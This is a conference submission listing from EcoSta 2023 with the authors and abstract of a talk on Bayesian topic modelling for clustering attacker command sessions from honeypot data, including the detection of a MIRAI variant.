EcoSta 2023: Start Registration
View Submission - EcoSta2023
A0229
Title: Unsupervised attack pattern detection in honeypot data using Bayesian topic modelling Authors:  Francesco Sanna Passino - Imperial College London (United Kingdom) [presenting]
Anastasia Mantziou - Imperial College London (United Kingdom)
Daniyar Ghani - Imperial College London (United Kingdom)
Philip Thiede - Imperial College London (United Kingdom)
Ross Bevington - Microsoft (United Kingdom)
Nick Heard - Imperial College London (United Kingdom)
Abstract: Cyber systems are under near-constant threat from intrusion attempts. Attack types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks appearing to share a common goal is very valuable to threat-hunting experts. The purpose is to explore topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks and identifying outliers. A range of statistical topic models is considered and adapted to the structures of command-line syntax. In particular, concepts of primary and secondary topics, and then session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow unboundedness in the vocabulary size and the number of latent intents. The methods are shown to discover an unusual MIRAI variant that attempts to take over existing cryptocurrency coin-mining infrastructure, which is not detected by traditional topic-modelling approaches.